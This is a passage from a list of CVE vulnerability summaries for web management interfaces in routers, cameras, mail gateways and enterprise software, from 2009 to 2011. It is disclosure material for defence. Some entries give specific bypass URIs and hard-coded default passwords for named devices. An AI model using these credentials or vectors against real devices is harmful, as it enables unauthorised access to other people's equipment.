earlier allows remote authenticated users to inject arbitrary web script or HTML via a crafted Call ID, as demonstrated by resultant cross-site request forgery (CSRF) attacks that change passwords or cause a denial of service, aka Bug ID CSCtq46488. [CVE-2011-2468] Directory traversal vulnerability in the web interface in AnyMacro Mail System G4X allows remote attackers to read arbitrary files via directory traversal sequences in a request. [CVE-2011-2078] Multiple cross-site scripting (XSS) vulnerabilities in the New Atlanta BlueDragon administrative interface in MediaCAST 8 and earlier allow remote attackers to inject arbitrary web script or HTML via unspecified vectors. [CVE-2011-1913] SQL injection vulnerability in the login form in the web interface in Mercator SENTINEL 2.0 allows remote attackers to execute arbitrary SQL commands via unspecified vectors. [CVE-2011-1904] An unspecified function in the web interface in Proofpoint Messaging Security Gateway 6.2.0.263:6.2.0.237 and earlier in Proofpoint Protection Server 5.5.3, 5.5.4, 5.5.5, 6.0.2, 6.1.1, and 6.2.0 allows remote attackers to execute arbitrary commands via unknown vectors, related to a "command injection" issue. [CVE-2011-1902] Directory traversal vulnerability in the web interface in Proofpoint Messaging Security Gateway 6.2.0.263:6.2.0.237 and earlier in Proofpoint Protection Server 5.5.3, 5.5.4, 5.5.5, 6.0.2, 6.1.1, and 6.2.0 allows remote attackers to read arbitrary files via unspecified vectors. [CVE-2011-1901] The mail-filter web interface in Proofpoint Messaging Security Gateway 6.2.0.263:6.2.0.237 and earlier in Proofpoint Protection Server 5.5.3, 5.5.4, 5.5.5, 6.0.2, 6.1.1, and 6.2.0 allows remote attackers to bypass authentication via unspecified vectors. [CVE-2011-1647] The web management interface on the Cisco RVS4000 Gigabit Security Router with software 1.x before 1.3.3.4 and 2.x before 2.0.2.7, and the WRVS4400N Gigabit Security Router with software before 2.0.2.1, allows remote attackers to read the private key for the admin SSL certificate via unspecified vectors, aka Bug ID CSCtn23871. [CVE-2011-1646] The web management interface on the Cisco RVS4000 Gigabit Security Router with software 1.x before 1.3.3.4 and 2.x before 2.0.2.7, and the WRVS4400N Gigabit Security Router with software before 2.0.2.1, allows remote authenticated users to execute arbitrary commands via the (1) ping test parameter or (2) traceroute test parameter, aka Bug ID CSCtn23871. [CVE-2011-1645] The web management interface on the Cisco RVS4000 Gigabit Security Router with software 1.x before 1.3.3.4 and 2.x before 2.0.2.7, and the WRVS4400N Gigabit Security Router with software before 2.0.2.1, allows remote attackers to read the backup configuration file, and consequently execute arbitrary code, via unspecified vectors, aka Bug ID CSCtn23871. [CVE-2011-1559] Unspecified vulnerability in the IBM Web Interface for Content Management (aka WEBi) 1.0.4 before FP3 has unknown impact and attack vectors. [CVE-2011-1558] Multiple cross-site scripting (XSS) vulnerabilities in the IBM Web Interface for Content Management (aka WEBi) 1.0.4 before FP3 allow remote attackers to inject arbitrary web script or HTML via unspecified vectors, a different vulnerability than CVE-2010-1242. [CVE-2011-1372] The Web User Interface on the IBM TS3100 and TS3200 tape libraries with firmware before A.60 allows remote attackers to bypass authentication and obtain administrative access via unspecified vectors. [CVE-2011-0951] The web-based management interface in Cisco Secure Access Control System (ACS) 5.1 before 5.1.0.44.6 and 5.2 before 5.2.0.26.3 allows remote attackers to change arbitrary user passwords via unspecified vectors, aka Bug ID CSCtl77440. [CVE-2011-0886] Multiple cross-site request forgery (CSRF) vulnerabilities in the web interface on the SMC SMCD3G-CCR (aka Comcast Business Gateway) with firmware before 1.4.0.49.2 allow remote attackers to (1) hijack the intranet connectivity of arbitrary users for requests that perform a login via goform/login, or hijack the authentication of administrators for requests that (2) enable external logins via an mso_remote_enable action to goform/RemoteRange or (3) change DNS settings via a manual_dns_enable action to goform/Basic. [CVE-2011-0885] A certain Comcast Business Gateway configuration of the SMC SMCD3G-CCR with firmware before 1.4.0.49.2 has a default password of D0nt4g3tme for the mso account, which makes it easier for remote attackers to obtain administrative access via the (1) web interface or (2) TELNET interface. [CVE-2011-0551] Cross-site request forgery (CSRF) vulnerability in the Web Interface in the Endpoint Protection Manager in Symantec Endpoint Protection (SEP) 11.0.600x through 11.0.6300 allows remote attackers to hijack the authentication of administrators for requests that create administrative accounts. [CVE-2011-0550] Multiple cross-site scripting (XSS) vulnerabilities in the Web Interface in the Endpoint Protection Manager in Symantec Endpoint Protection (SEP) 11.0.600x through 11.0.6300 allow remote attackers to inject arbitrary web script or HTML via (1) the token parameter to portal/Help.jsp or (2) the URI in a console/apps/sepm request. [CVE-2011-0388] Cisco TelePresence Recording Server devices with software 1.6.x and Cisco TelePresence Multipoint Switch (CTMS) devices with software 1.0.x, 1.1.x, 1.5.x, and 1.6.x do not properly restrict remote access to the Java servlet RMI interface, which allows remote attackers to cause a denial of service (memory consumption and web outage) via multiple crafted requests, aka Bug IDs CSCtg35830 and CSCtg35825. [CVE-2011-0387] The administrative web interface on Cisco TelePresence Multipoint Switch (CTMS) devices with software 1.0.x, 1.1.x, 1.5.x, and 1.6.x allows remote authenticated users to cause a denial of service or have unspecified other impact via vectors involving access to a servlet, aka Bug ID CSCtf97164. [CVE-2011-0385] The administrative web interface on Cisco TelePresence Recording Server devices with software 1.6.x and Cisco TelePresence Multipoint Switch (CTMS) devices with software 1.0.x, 1.1.x, 1.5.x, and 1.6.x allows remote attackers to create or overwrite arbitrary files, and possibly execute arbitrary code, via a crafted request, aka Bug IDs CSCth85786 and CSCth61065. [CVE-2011-0352] Buffer overflow in the web-based management interface on the Cisco Linksys WRT54GC router with firmware before 1.06.1 allows remote attackers to cause a denial of service (device crash) via a long string in a POST request. [CVE-2011-0344] Multiple stack-based buffer overflows in unspecified CGI programs in the Unified Maintenance Tool web interface in the embedded web server in the Communication Server (CS) in Alcatel-Lucent OmniPCX Enterprise before R9.0 H1.301.50 allow remote attackers to execute arbitrary code via crafted HTTP headers. [CVE-2011-0050] Cross-site scripting (XSS) vulnerability in the nonjs interface (interfaces/nonjs.pm) in CGI:IRC before 0.5.10 allows remote attackers to inject arbitrary web script or HTML via the R parameter. [CVE-2011-0049] Directory traversal vulnerability in the _list_file_get function in lib/Majordomo.pm in Majordomo 2 before 20110131 allows remote attackers to read arbitrary files via .. (dot dot) sequences in the help command, as demonstrated using (1) a crafted email and (2) cgi-bin/mj_wwwusr in the web interface. [CVE-2011-0013] Multiple cross-site scripting (XSS) vulnerabilities in the HTML Manager Interface in Apache Tomcat 5.5 before 5.5.32, 6.0 before 6.0.30, and 7.0 before 7.0.6 allow remote attackers to inject arbitrary web script or HTML, as demonstrated via the display-name tag. [CVE-2010-4762] Cross-site scripting (XSS) vulnerability in the rich-text-editor component in Open Ticket Request System (OTRS) before 3.0.0-beta2 allows remote authenticated users to inject arbitrary web script or HTML by using the "source code" feature in the customer interface. [CVE-2010-4733] WebSCADA WS100 and WS200, Easy Connect EC150, Modbus RTU - TCP Gateway MB100, and Serial Ethernet Server SS100 on the IntelliCom NetBiter NB100 and NB200 platforms have a default username and password, which makes it easier for remote attackers to obtain superadmin access via the web interface, a different vulnerability than CVE-2009-4463. [CVE-2010-4515] Cross-site scripting (XSS) vulnerability in Citrix Web Interface 5.0, 5.1, and 5.3 allows remote attackers to inject arbitrary web script or HTML via unspecified vectors, a different vulnerability than CVE-2007-6477 and CVE-2009-2454. [CVE-2010-4412] Multiple cross-site scripting (XSS) vulnerabilities in pfSense 2 beta 4 allow remote attackers to inject arbitrary web script or HTML via (1) the id parameter in an olsrd.xml action to pkg_edit.php, (2) the xml parameter to pkg.php, or the if parameter to (3) status_graph.php or (4) interfaces.php, a different vulnerability than CVE-2008-1182 and CVE-2010-4246. [CVE-2010-4304] The web interface in Cisco Unified Videoconferencing (UVC) System 3545, 5110, 5115, and 5230 [CVE-2010-4232] The web-based administration interface on the Camtron CMNC-200 Full HD IP Camera and TecVoz CMNC-200 Megapixel IP Camera with firmware 1.102A-008 allows remote attackers to bypass authentication via a // (slash slash) at the beginning of a URI, as demonstrated by the //system.html URI. [CVE-2010-4231] Directory traversal vulnerability in the web-based administration interface on the Camtron CMNC-200 Full HD IP Camera and TecVoz CMNC-200 Megapixel IP Camera with firmware 1.102A-008 allows remote attackers to read arbitrary files via a .. (dot dot) in the URI. [CVE-2010-3892] Session fixation vulnerability in the login form in the administrator interface in IBM OmniFind Enterprise Edition 8.x and 9.x allows remote attackers to hijack web sessions by replaying a session ID (aka SID) value. [CVE-2010-3890] Cross-site scripting (XSS) vulnerability in IBM OmniFind Enterprise Edition before 9.1 allows remote attackers to inject arbitrary web script or HTML via the command parameter to the administration interface, as demonstrated by the command parameter to ESAdmin/collection.do. [CVE-2010-3854] Multiple cross-site scripting (XSS) vulnerabilities in the web administration interface (aka Futon) in Apache CouchDB 0.8.0 through 1.0.1 allow remote attackers to inject arbitrary web script or HTML via unspecified vectors. [CVE-2010-3684] The FTP authentication module in Synology Disk Station 2.x logs passwords to the web application interface in cases of incorrect login attempts, which allows local users to obtain sensitive information by reading a log, a different vulnerability than CVE-2010-2453. [CVE-2010-3490] Directory traversal vulnerability in page.recordings.php in the System Recordings component in the configuration interface in FreePBX 2.8.0 and earlier allows remote authenticated administrators to create arbitrary files via a .. (dot dot) in the usersnum parameter to admin/config.php, as demonstrated by creating a .php file under the web root. [CVE-2010-3459] Cross-site scripting (XSS) vulnerability in the Ajax WebMail interface in AXIGEN Mail Server before 7.4.2 allows remote attackers to inject arbitrary web script or HTML via unspecified vectors. [CVE-2010-3056] Multiple cross-site scripting (XSS) vulnerabilities in phpMyAdmin 2.11.x before 2.11.10.1 and 3.x before 3.3.5.1 allow remote attackers to inject arbitrary web script or HTML via vectors related to (1) db_search.php, (2) db_sql.php, (3) db_structure.php, (4) js/messages.php, (5) libraries/common.lib.php, (6) libraries/database_interface.lib.php, (7) libraries/dbi/mysql.dbi.lib.php, (8) libraries/dbi/mysqli.dbi.lib.php, (9) libraries/db_info.inc.php, (10) libraries/sanitizing.lib.php, (11) libraries/sqlparser.lib.php, (12) server_databases.php, (13) server_privileges.php, (14) setup/config.php, (15) sql.php, (16) tbl_replace.php, and (17) tbl_sql.php. [CVE-2010-3037] goform/websXMLAdminRequestCgi.cgi in Cisco Unified Videoconferencing (UVC) System 5110 and 5115, and possibly Unified Videoconferencing System 3545 and 5230, Unified Videoconferencing 3527 Primary Rate Interface (PRI) Gateway, Unified Videoconferencing 3522 Basic Rate Interfaces (BRI) Gateway, and Unified Videoconferencing 3515 Multipoint Control Unit (MCU), allows remote authenticated administrators to execute arbitrary commands via the username field, related to a "shell command injection vulnerability," aka Bug ID CSCti54059. [CVE-2010-2986] Cross-site scripting (XSS) vulnerability in webacs/QuickSearchAction.do in the search feature in the web interface in Cisco Wireless Control System (WCS) before 6.0(194.0) and 7.x before 7.0.164 allows remote attackers to inject arbitrary web script or HTML via the searchText parameter, aka Bug ID CSCtf14288. [CVE-2010-2732] Open redirect vulnerability in the web interface in Microsoft Forefront Unified Access Gateway (UAG) 2010 Gold, 2010 Update 1, and 2010 Update 2 allows remote attackers to redirect users to arbitrary web sites and conduct phishing attacks via unspecified vectors, aka "UAG Redirection Spoofing Vulnerability." [CVE-2010-2644] IBM WebSphere Service Registry and Repository (WSRR) 7.0.0 before FP1 does not properly implement access control, which allows remote attackers to perform governance actions via unspecified API requests to an EJB interface. [CVE-2010-2594] Multiple cross-site request forgery (CSRF) vulnerabilities in the web management interface in InterSect Alliance Snare Agent 3.2.3 and earlier on Solaris, Snare Agent 3.1.7 and earlier on Windows, Snare Agent 1.5.0 and earlier on Linux and AIX, Snare Agent 1.4 and earlier on IRIX, Snare Epilog 1.5.3 and earlier on Windows, and Snare Epilog 1.2 and earlier on UNIX allow remote attackers to hijack the authentication of administrators for requests that (1) change the password or (2) change the listening port. [CVE-2010-2453] Multiple cross-site scripting (XSS) vulnerabilities in Synology Disk Station 2.x before DSM3.0-1337 allow remote attackers to inject arbitrary web script or HTML by connecting to the FTP server and providing a crafted (1) USER or (2) PASS command, which is written by the FTP logging module to a web-interface log window, related to a "web commands injection" issue. [CVE-2010-2428] Cross-site scripting (XSS) vulnerability in admin_loginok.html in the Administrator web interface in Wing FTP Server for Windows 3.5.0 and earlier allows remote attackers to inject arbitrary web script or HTML via a crafted POST request. [CVE-2010-2293] The Ping tools web interface in Dlink Di-604 router allows remote authenticated users to cause a denial of service via a large "ip textfield" size. [CVE-2010-2292] Cross-site scripting (XSS) vulnerability in the Ping tools web interface in Dlink Di-604 router allows remote attackers to inject arbitrary web script or HTML via the IP field. [CVE-2010-2291] Unspecified vulnerability in the web interface in snom VoIP Phone firmware 8 before 8.2.35 allows remote attackers to bypass intended restrictions and modify user credentials via unknown vectors. NOTE: some of these details are obtained from third party information. [CVE-2010-2228] Cross-site scripting (XSS) vulnerability in the MNET access-control interface in Moodle before 1.8.13 and 1.9.x before 1.9.9 allows remote attackers to inject arbitrary web script or HTML via vectors involving extended characters in a username. [CVE-2010-2116] The web interface in McAfee Email Gateway (formerly IronMail) 6.7.1 allows remote authenticated users, with only Read privileges, to gain Write privileges to modify configuration via the save action in a direct request to admin/systemWebAdminConfig.do. [CVE-2010-2082] The web interface on the Cisco Scientific Atlanta WebSTAR DPC2100R2 cable modem with firmware 2.0.2r1256-060303 has a default administrative password (aka SAPassword) of W2402, which makes it easier for remote attackers to obtain privileged access. [CVE-2010-2026] The web interface on the Cisco Scientific Atlanta WebSTAR DPC2100R2 cable modem with firmware 2.0.2r1256-060303 allows remote attackers to bypass authentication, and reset the modem or replace the firmware, via a direct request to an unspecified page. [CVE-2010-2025] Multiple cross-site request forgery (CSRF) vulnerabilities in the web interface on the Cisco Scientific Atlanta WebSTAR DPC2100R2 cable modem with firmware 2.0.2r1256-060303 allow remote attackers to hijack the authentication of administrators for requests that (1) reset the modem, (2) erase the firmware, (3) change the administrative password, (4) install modified firmware, or (5) change the access level, as demonstrated by a request to goform/_aslvl. [CVE-2010-1985] Multiple cross-site scripting (XSS) vulnerabilities in the administrative user interface in Six Apart Movable Type 5.0 and 5.01 allow remote attackers to inject arbitrary web script or HTML via unknown vectors. [CVE-2010-1913] The default configuration of pluginlicense.ini for the SdcWebSecureBase interface in tgctlcm.dll in Consona Live Assistance, Dynamic Agent, and Subscriber Assistance, when downloaded from a server operated by Telefonica or possibly other companies, contains an incorrect DNS whitelist that includes the DNS hostnames of home computers of many persons, which allows remote attackers to bypass intended restrictions on ActiveX execution by hosting an ActiveX control on an applicable home web server. [CVE-2010-1912] The SdcWebSecureBase interface in tgctlcm.dll in Consona Live Assistance, Dynamic Agent, and Subscriber Assistance allows remote attackers to bypass intended restrictions on ActiveX execution via "instantiation/free attacks." [CVE-2010-1911] The site-locking implementation in the SdcWebSecureBase interface in tgctlcm.dll in Consona Live Assistance, Dynamic Agent, and Subscriber Assistance relies on a list of server domain names to restrict execution of ActiveX controls, which makes it easier for man-in-the-middle attackers to execute arbitrary code via a DNS hijacking attack. [CVE-2010-1757] WebKit in Apple iOS before 4 on the iPhone and iPod touch does not enforce the expected boundary restrictions on content display by an IFRAME element, which allows remote attackers to spoof the user interface via a crafted HTML document. [CVE-2010-1748] The cgi_initialize_string function in cgi-bin/var.c in the web interface in CUPS before 1.4.4, as used on Apple Mac OS X 10.5.8, Mac OS X 10.6 before 10.6.4, and other platforms, does not properly handle parameter values containing a % (percent) character without two subsequent hex characters, which allows context-dependent attackers to obtain sensitive information from cupsd process memory via a crafted request, as demonstrated by the (1) /admin?OP=redirect&URL=% and (2) /admin?URL=/admin/&OP=% URIs. [CVE-2010-1612] The IBM WebSphere DataPower XML Accelerator XA35, Low Latency Appliance XM70, Integration Appliance XI50, B2B Appliance XB60, and XML Security Gateway XS40 SOA Appliances before 3.8.0.0, when a QLOGIC Ethernet interface is used, allow remote attackers to cause a denial of service (interface outage) via malformed ICMP packets to the 0.0.0.0 destination IP address. [CVE-2010-1607] Directory traversal vulnerability in wmi.php in the Webmoney Web Merchant Interface (aka WMI or com_wmi) component 1.5.0 for Joomla! allows remote attackers to include and execute arbitrary local files via a .. (dot dot) in the controller parameter to index.php. [CVE-2010-1573] Linksys WAP54Gv3 firmware 3.04.03 and earlier uses a hard-coded username (Gemtek) and password (gemtekswd) for a debug interface for certain web pages, which allows remote attackers to execute arbitrary commands via the (1) data1, (2) data2, or (3) data3 parameters to (a) Debug_command_page.asp and (b) debug.cgi. [CVE-2010-1530] Multiple cross-site scripting (XSS) vulnerabilities in the Internationalization module 6.x before 6.x-1.4 for Drupal allow remote authenticated users, with translate interface or administer blocks privileges, to inject arbitrary web script or HTML via (1) strings used in block translation or (2) the untranslated input. [CVE-2010-1243] The IBM Web Interface for Content Management (aka WEBi) before 1.0.4 creates persistent cookies on client workstations, which has unspecified impact and attack vectors. [CVE-2010-1242] Multiple cross-site scripting (XSS) vulnerabilities in the IBM Web Interface for Content Management (aka WEBi) before 1.0.4 allow remote attackers to inject arbitrary web script or HTML via unspecified vectors. [CVE-2010-1107] Cross-site scripting (XSS) vulnerability in the Recent Comments module 5.x through 5.x-1.2 and 6.x through 6.x-1.0 for Drupal allows remote authenticated users to inject arbitrary web script or HTML via a "custom block title interface." [CVE-2010-0540] Cross-site request forgery (CSRF) vulnerability in the web interface in CUPS before 1.4.4, as used on Apple Mac OS X 10.5.8, Mac OS X 10.6 before 10.6.4, and other platforms, allows remote attackers to hijack the authentication of administrators for requests that change settings. [CVE-2010-0418] The web interface in chumby one before 1.0.4 and chumby classic before 1.7.2 allows remote attackers to execute arbitrary commands via shell metacharacters in a request. [CVE-2010-0214] The administrative interface on the PolyVision RoomWizard with firmware 3.2.3 places the Sync Connector Active Directory (AD) credentials in a web form that is accessed over HTTP on port 80, which allows remote attackers to obtain sensitive information by reading the HTML source code corresponding to the /admin/sign/DeviceSynch URI. [CVE-2010-0152] Multiple cross-site scripting (XSS) vulnerabilities in the Local Management Interface (LMI) on the IBM Proventia Network Mail Security System (PNMSS) appliance with firmware before 2.5.0.2 allow remote attackers to inject arbitrary web script or HTML via (1) the date1 parameter to pvm_messagestore.php, (2) the userfilter parameter to pvm_user_management.php, (3) the ping parameter to sys_tools.php in a sys_ping.php action, (4) the action parameter to pvm_cert_commaction.php, (5) the action parameter to pvm_cert_serveraction.php, (6) the action parameter to pvm_smtpstore.php, (7) the l parameter to sla/index.php, or (8) unspecified stored data [CVE-2010-0140] Multiple unspecified vulnerabilities in the web server in Cisco Unified MeetingPlace 7 before 7.0(2.3) hotfix 5F, 6 before 6.0.639.3, and possibly 5 allow remote attackers to create (1) user or (2) administrator accounts via a crafted URL in a request to the internal interface, aka Bug IDs CSCtc59231 and CSCtd40661. [CVE-2009-5092] Cross-site scripting (XSS) vulnerability in the management interface in Microsoft FAST ESP 5.1.5 and earlier allows remote attackers to inject arbitrary web script or HTML via unspecified vectors. [CVE-2009-4896] Multiple directory traversal vulnerabilities in the mlmmj-php-admin web interface for Mailing List Managing Made Joyful (mlmmj) 1.2.15 through 1.2.17 allow remote authenticated users to overwrite, create, or delete arbitrary files, or determine the existence of arbitrary directories, via a .. (dot dot) in a list name in a (1) edit or (2) save action. [CVE-2009-4658] Xerver 4.32 allows remote authenticated users to cause a denial of service (daemon crash) via a non-numeric web port assignment in the management interface. NOTE: this can be leveraged by non-authenticated attackers using CVE-2009-4657. [CVE-2009-4646] Static code injection vulnerability in the administrative web interface in Accellion Secure File Transfer Appliance allows remote authenticated administrators to inject arbitrary shell commands by appending them to a request to update the SNMP public community string. [CVE-2009-4511] Multiple directory traversal vulnerabilities in the web administration interface on the TANDBERG Video Communication Server (VCS) before X5.1 allow remote authenticated users to read arbitrary files via a .. (dot dot) in the page parameter to (1) helppage.php or (2) user/helppage.php. [CVE-2009-4357] CQWeb (aka the web interface) in IBM Rational ClearQuest before 7.1.1 does not properly handle use of legacy URLs for automatic login, which might allow attackers to discover the passwords for user accounts via unspecified vectors. [CVE-2009-4149] Cross-site scripting (XSS) vulnerability in the web interface in CA Service Desk 12.1 allows remote attackers to inject arbitrary web script or HTML via an unspecified parameter. [CVE-2009-3832] Opera before 10.01 on Windows does not prevent use of Web fonts in rendering the product's own user interface, which allows remote attackers to spoof the address field via a crafted web site. [CVE-2009-3828] The web interface for Everfocus EDR1600 DVR allows remote attackers to bypass authentication and access live cams via certain vectors. [CVE-2009-3701] Multiple cross-site scripting (XSS) vulnerabilities in the administration interface in Horde Application Framework before 3.3.6, Horde Groupware before 1.2.5, and Horde Groupware Webmail Edition before 1.2.5 allow remote attackers to inject arbitrary web script or HTML via the PATH_INFO to (1) phpshell.php, (2) cmdshell.php, or (3) sqlshell.php in admin/, related to the PHP_SELF variable. [CVE-2009-3653] Cross-site scripting (XSS) vulnerability in the additional links interface in XML Sitemap 5.x-1.6, a module for Drupal, allows remote authenticated users, with "administer site configuration" permission, to inject arbitrary web script or HTML via unspecified vectors, related to link path output. [CVE-2009-3487] Multiple cross-site scripting (XSS) vulnerabilities in the J-Web interface in Juniper JUNOS 8.5R1.14 allow remote authenticated users to inject arbitrary web script or HTML via (1) the JEXEC_OUTID parameter in a JEXEC_MODE_RELAY_OUTPUT action to the jexec program [CVE-2009-3486] Multiple cross-site scripting (XSS) vulnerabilities in the J-Web interface in Juniper JUNOS 8.5R1.14 allow remote authenticated users to inject arbitrary web script or HTML via the host parameter to (1) the pinghost program, reachable through the diagnose program [CVE-2009-3485] Cross-site scripting (XSS) vulnerability in the J-Web interface in Juniper JUNOS 8.5R1.14 and 9.0R1.1 allows remote attackers to inject arbitrary web script or HTML via the PATH_INFO to the default URI. [CVE-2009-2968] Directory traversal vulnerability in a support component in the web interface in VMware Studio 2.0 public beta before build 1017-185256 allows remote attackers to upload files to arbitrary locations via unspecified vectors. [CVE-2009-2898] Cross-site scripting (XSS) vulnerability in the Alerts list feature in the web interface in SpringSource Hyperic HQ 3.2.x before 3.2.6.1, 4.0.x before 4.0.3.1, 4.1.x before 4.1.2.1, and 4.2-beta1 [CVE-2009-2897] Multiple cross-site scripting (XSS) vulnerabilities in hq/web/common/GenericError.jsp in the generic exception handler in the web interface in SpringSource Hyperic HQ 3.2.x before 3.2.6.1, 4.0.x before 4.0.3.1, 4.1.x before 4.1.2.1, and 4.2-beta1 [CVE-2009-2851] Cross-site scripting (XSS) vulnerability in the administrator interface in WordPress before 2.8.2 allows remote attackers to inject arbitrary web script or HTML via a comment author URL. [CVE-2009-2820] The web interface in CUPS before 1.4.2, as used on Apple Mac OS X before 10.6.2 and other platforms, does not properly handle (1) HTTP headers and (2) HTML templates, which allows remote attackers to conduct cross-site scripting (XSS) attacks and HTTP response splitting attacks via vectors related to (a) the product's web interface, (b) the configuration of the print system, and (c) the titles of printed jobs, as demonstrated by an XSS attack that uses the kerberos parameter to the admin program, and leverages attribute injection and HTTP Parameter Pollution (HPP) issues. [CVE-2009-2747] The Java Naming and Directory Interface (JNDI) implementation in IBM WebSphere Application Server (WAS) 6.0 before 6.0.2.39, 6.1 before 6.1.0.29, and 7.0 before 7.0.0.7 does not properly restrict access to UserRegistry object methods, which allows remote attackers to obtain sensitive information via a crafted method call. [CVE-2009-2583] Multiple session fixation vulnerabilities in IBM Tivoli Identity Manager (ITIM) 5.0.0.6 allow remote attackers to hijack web sessions via unspecified vectors involving the (1) console and (2) self service interfaces. [CVE-2009-2454] Cross-site scripting (XSS) vulnerability in Citrix Web Interface 4.6, 5.0, and 5.0.1 allows remote attackers to inject arbitrary web script or HTML via unspecified vectors. [CVE-2009-2344] The web-based management interfaces in Sourcefire Defense Center (DC) and 3D Sensor before 4.8.2 allow remote authenticated users to gain privileges via a $admin value for the admin parameter in an edit action to admin/user/user.cgi and unspecified other components. [CVE-2009-2323] The web interface on the Axesstel MV 410R redirects users back to the referring page after execution of some CGI scripts, which makes it easier for remote attackers to avoid detection of cross-site request forgery (CSRF) attacks, as demonstrated by a redirect from the cgi-bin/wireless.cgi script. [CVE-2009-2320] The web interface on the Axesstel MV 410R relies on client-side JavaScript code to validate input, which allows remote attackers to send crafted data, and possibly have unspecified other impact, via a client that does not process JavaScript. [CVE-2009-2316] Multiple cross-site scripting (XSS) vulnerabilities in IBM Tivoli Identity Manager (ITIM) 5.0 allow remote attackers to inject arbitrary web script or HTML by entering an unspecified URL in (1) the self-service UI interface or (2) the console interface. NOTE: it was later reported that 4.6.0 is also affected by the first vector. [CVE-2009-2300] The management interface in the phion airlock Web Application Firewall (WAF) 4.1-10.41 does not properly handle CGI requests that specify large width and height parameters for an image, which allows remote attackers to execute arbitrary commands or cause a denial of service (resource consumption) via a crafted request. [CVE-2009-2271] The Huawei D100 has (1) a certain default administrator password for the web interface, and does not force a password change [CVE-2009-2258] Directory traversal vulnerability in cgi-bin/webcm in the administrative web interface on the Netgear DG632 with firmware 3.4.0_ap allows remote attackers to list arbitrary directories via a .. (dot dot) in the nextpage parameter. [CVE-2009-2257] The administrative web interface on the Netgear DG632 with firmware 3.4.0_ap allows remote attackers to bypass authentication via a direct request to (1) gateway/commands/saveconfig.html, and (2) stattbl.htm, (3) modemmenu.htm, (4) onload.htm, (5) form.css, (6) utility.js, and possibly (7) indextop.htm in html/. [CVE-2009-2256] The administrative web interface on the Netgear DG632 with firmware 3.4.0_ap allows remote attackers to cause a denial of service (web outage) via an HTTP POST request to cgi-bin/firmwarecfg. [CVE-2009-2119] Cross-site scripting (XSS) vulnerability in the login interface (my.logon.php3) in F5 FirePass SSL VPN 5.5 through 5.5.2 and 6.0 through 6.0.3 allows remote attackers to inject arbitrary web script or HTML via a base64-encoded xcho parameter. [CVE-2009-2079] Cross-site scripting (XSS) vulnerability in the administrative page interface in Taxonomy manager 5.x before 5.x-1.2 and 6.x before 6.x-1.1, a module for Drupal, allows remote authenticated users, with administer taxonomy privileges or the ability to use free tagging to add taxonomy terms, to inject arbitrary web script or HTML via (1) vocabulary names, (2) synonyms, and (3) term names. [CVE-2009-2076] Cross-site scripting (XSS) vulnerability in Views 6.x before 6.x-2.6, a module for Drupal, allows remote authenticated users to inject arbitrary web script or HTML via (1) exposed filters in the Views UI administrative interface and in the (2) view name parameter in the define custom views feature. NOTE: vector 2 is only exploitable by users with administer views permissions. [CVE-2009-2048] Cross-site scripting (XSS) vulnerability in the Administration interface in Cisco Customer Response Solutions (CRS) before 7.0(1) SR2 in Cisco Unified Contact Center Express (aka CCX) server allows remote authenticated users to inject arbitrary web script or HTML into the CCX database via unspecified vectors. [CVE-2009-1769] The web interface in Open Computer and Software Inventory Next Generation (OCS Inventory NG) 1.01 generates different error messages depending on whether a username is valid, which allows remote attackers to enumerate valid usernames. [CVE-2009-1484] Cross-site scripting (XSS) vulnerability in the web mail interface feature in AXIGEN Mail Server 6.2.2 allows remote attackers to inject arbitrary web script or HTML via unspecified vectors involving e-mail messages. NOTE: the provenance of this information is unknown [CVE-2009-1477] The https web interfaces on the ATEN KH1516i IP KVM switch with firmware 1.0.063, the KN9116 IP KVM switch with firmware 1.1.104, and the PN9108 power-control unit have a hardcoded SSL private key, which makes it easier for remote attackers to decrypt https sessions by extracting this key from their own switch and then sniffing network traffic to a switch owned by a different customer. [CVE-2009-1333] Cross-site scripting (XSS) vulnerability in refresh_rate.htm in the web interface on the HP Deskjet 6840 printer with firmware XF1M131A allows remote attackers to inject arbitrary web script or HTML via the POST request body. [CVE-2009-1290] Multiple cross-site request forgery (CSRF) vulnerabilities in the web administration interface in the Advanced Management Module (AMM) on the IBM BladeCenter, including the BladeCenter H with BPET36H 54, allow remote attackers to hijack the authentication of administrators, as demonstrated by a power-off request to the private/blade_power_action script. [CVE-2009-1166] The administrative web interface on the Cisco Wireless LAN Controller (WLC) platform 4.x before 4.2.205.0 and 5.x before 5.2.191.0, as used in Cisco 1500 Series, 2000 Series, 2100 Series, 4100 Series, 4200 Series, and 4400 Series Wireless Services Modules (WiSM), WLC Modules for Integrated Services Routers, and Catalyst 3750G Integrated Wireless LAN Controllers, allows remote attackers to cause a denial of service (device reload) via a crafted (1) HTTP or (2) HTTPS request, aka Bug ID CSCsy27708. [CVE-2009-1164] The administrative web interface on the Cisco Wireless LAN Controller (WLC) platform 4.2 before 4.2.205.0 and 5.x before 5.2.178.0, as used in Cisco 1500 Series, 2000 Series, 2100 Series, 4100 Series, 4200 Series, and 4400 Series Wireless Services Modules (WiSM), WLC Modules for Integrated Services Routers, and Catalyst 3750G Integrated Wireless LAN Controllers, allows remote attackers to cause a denial of service (device reload) via a malformed response to a (1) HTTP or (2) HTTPS authentication request, aka Bug ID CSCsx03715. [CVE-2009-1048] The web interface on the snom VoIP phones snom 300, snom 320, snom 360, snom 370, and snom 820 with firmware 6.5 before 6.5.20, 7.1 before 7.1.39, and 7.3 before 7.3.14 allows remote attackers to bypass authentication, and reconfigure the phone or make arbitrary use of the phone, via a (1) http or (2) https request with 127.0.0.1 in the Host header. [CVE-2009-0933] Cross-site scripting (XSS) vulnerability in the administrative interface in Dotclear before 2.1.5 allows remote attackers to inject arbitrary web script or HTML via unspecified vectors. [CVE-2009-0860] Cross-site scripting (XSS) vulnerability in the web user interface in the login application in NetMRI 3.0.1 and earlier allows remote attackers to inject arbitrary web script or HTML via unspecified vectors, related to error pages. [CVE-2009-0816] Multiple cross-site scripting (XSS) vulnerabilities in the backend user interface in TYPO3 3.3.x through 3.8.x, 4.0 before 4.0.12, 4.1 before 4.1.10, 4.2 before 4.2.6, and 4.3alpha1 allow remote attackers to inject arbitrary web script or HTML via unspecified fields. [CVE-2009-0680] cgi-bin/welcome/VPN_only in the web interface in Netgear SSL312 allows remote attackers to cause a denial of service (device crash) via a crafted query string, as demonstrated using directory traversal sequences. [CVE-2009-0548] Cross-site scripting (XSS) vulnerability in the Additional Report Settings interface in ESET Remote Administrator before 3.0.105 allows remote attackers to inject arbitrary web script or HTML via unspecified vectors. NOTE: some of these details are obtained from third party information. [CVE-2009-0474] The web interface in the Rockwell Automation ControlLogix 1756-ENBT/A EtherNet/IP Bridge Module allows remote attackers to obtain "internal web page information" and "internal information about the module" via unspecified vectors. NOTE: this may overlap 